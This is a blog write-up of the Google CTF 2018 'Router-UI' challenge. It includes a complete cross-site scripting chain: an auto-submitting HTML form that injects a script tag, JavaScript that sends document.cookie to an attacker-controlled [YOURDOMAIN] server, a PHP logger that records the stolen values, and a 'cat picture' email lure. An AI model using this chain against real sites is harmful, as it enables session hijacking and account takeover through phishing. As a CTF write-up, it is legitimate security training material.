Skip to content

YlmzCmlttn

Cemalettin Yılmaz Blog

Menu
  • Home
  • About Me
  • Projects
    • Iot-AR
    • Magnifi-AR
    • Smarthome-IOS
    • Others
  • Categories
    • Articles
    • Augmented Reality
    • Capture The Flag
      • Google CTF
        • 2018
    • Embedded Systems
    • IoT
    • Logisim
    • My Essays
    • Nvidia Jetson
      • Jetson TX1
    • Operating Systems
      • Kali
      • Raspbian
      • Ubuntu
    • Personal
    • Programming
      • Arduino
      • C
      • C#
      • Css
      • Html
      • Js
      • Matlab
      • Node.js
      • Python
      • Swift
      • VHDL
    • Projects
      • Embedded Systems
      • Electric
      • IoT
      • IoT-AR
      • Logisim
      • Magnifi-AR
      • Pose Estimation
    • Raspberry Pi
    • Xilinx
    • Others
Menu

Router-UI | Google CTF 2018

Posted on March 23, 2019 by Yılmaz Cemalettin

Google CTF 2018

Router-UI

Using the domain found on the hardened aluminum key, you make your way on to the OffHub router. A revolutionary device that simplifies your life. You’re at the UI page, but attempting to brute force the password failed miserably. If we could find an XSS on the page then we could use it to steal the root user session token. In case you find something, try to send an email to wintermuted@googlegroups.com. If you claim your link includes cat pictures, I’m sure Wintermuted will click it. I hope Chrome’s XSS filter will not block the exploit though.

https://router-ui.web.ctfcompetition.com/

You can find my all CTF solution in here

 

XSS means cross site scripting. This gives us the clue about the weakness of the website.

When we open the website we encounter bellow window.

Try with ;

username: test

password : testpassword

Output is;

we can use this post request

I write some script for XSS vulnaribities.

But your domain must be have SSL certificates. Beacuse Google Chrome block http:// request so that, your domain must be https://

badlogin.html

XHTML
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Cats</title>
</head>
<body>
<form method="POST" action="https://router-ui.web.ctfcompetition.com/login">
<input name="username" value="&lt;script src=https:">
<input name="password" value="[YOURDOMAIN].com/badjs.js&gt;&lt/script&gt;">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

 

badphp.php

PHP
1
2
3
<?php
file_put_contents('logbad.txt',$_SERVER['REQUEST_URI'].PHP_EOL,FILE_APPEND);
die;

 

badjs.js

JavaScript
1
window.location.href='https://[YOURDOMAIN].com/badphp.php?'+document.cookie;

After that, I send an e-mail to wintermuted@googlegroups.com

“Please visit https://www.[YOURDOMAIN].com/badlogin.html for cat picture”

After 1 min, I check logbad.txt and I found cookie season.

/badphp.php?flag=Try%20the%20session%20cookie;%20session=Avaev8thDieM6Quauoh2TuDeaez9Weja

I added this cookie in chrome

When I Reload the page, I loged in website. When I open the passpord value with inspector I found the flag.

 

<input type=”password” value=”CTF{Kao4pheitot7Ahmu}”>

CTF{Kao4pheitot7Ahmu}

 

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

My Motto

“Learn to share, Share to learn”

LinkedIn Badge

Cemalettin Yılmaz

Ads

Archives

Categories

  • Articles (1)
  • Augmented Reality (3)
  • Capture The Flag (23)
    • Google CTF (22)
      • 2018 (13)
      • 2019 (9)
    • PicoCTF (1)
      • 2019 (1)
  • Embedded Systems (3)
  • IoT (3)
  • Logisim (1)
  • My Essays (3)
  • Nvidia Jetson (5)
    • Xavier (5)
  • Operating Systems (24)
    • Kali (3)
    • Raspbian (2)
    • Ubuntu (21)
  • Others (1)
  • Personal (1)
  • Programming (44)
    • Arduino (4)
    • C (10)
    • C# (4)
    • C++ (5)
    • Css (1)
    • CUDA (6)
    • Html (1)
    • Js (2)
    • Libraries (5)
      • OpenCV (3)
      • OpenGL (2)
    • Matlab (14)
    • Node.js (5)
    • Python (6)
    • Swift (3)
  • Programs (4)
    • Tools (4)
  • Projects (21)
    • Books Solutions (8)
    • Electric (2)
    • Embedded Systems (2)
    • Energy Harvesting (1)
    • IoT (2)
    • IoT-AR (1)
    • Logisim (1)
    • Magnifi-AR (3)
    • Pose Estimation (3)
    • Smarthome-Ios (1)
  • Raspberry Pi (3)
  • Uncategorized (2)
  • YZlib (1)

Recent Posts

  • atof stof stod problems with local floating point separator in C/C++
  • Pico CTF 2019 Answers
  • YZlib: Personal C++ Library
  • Drive to target | Google CTF 2019
  • FriendSpaceBookPlusAllAccessRedPremium | Google CTF 2019

Recent Comments

  • AbaShelha on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Peter on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on 16-Bit CPU on Logisim
  • Jenny on 16-Bit CPU on Logisim
  • MOON on 16-Bit CPU on Logisim
  • anti on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • hunkerjr on STOP GAN | Google CTF 2019
  • Shaq on 16-Bit CPU on Logisim
  • NURUL AFIQAH MOHD HASBULLAH on 16-Bit CPU on Logisim

Linkedln

© 2022 YlmzCmlttn | Powered by Superbs Personal Blog theme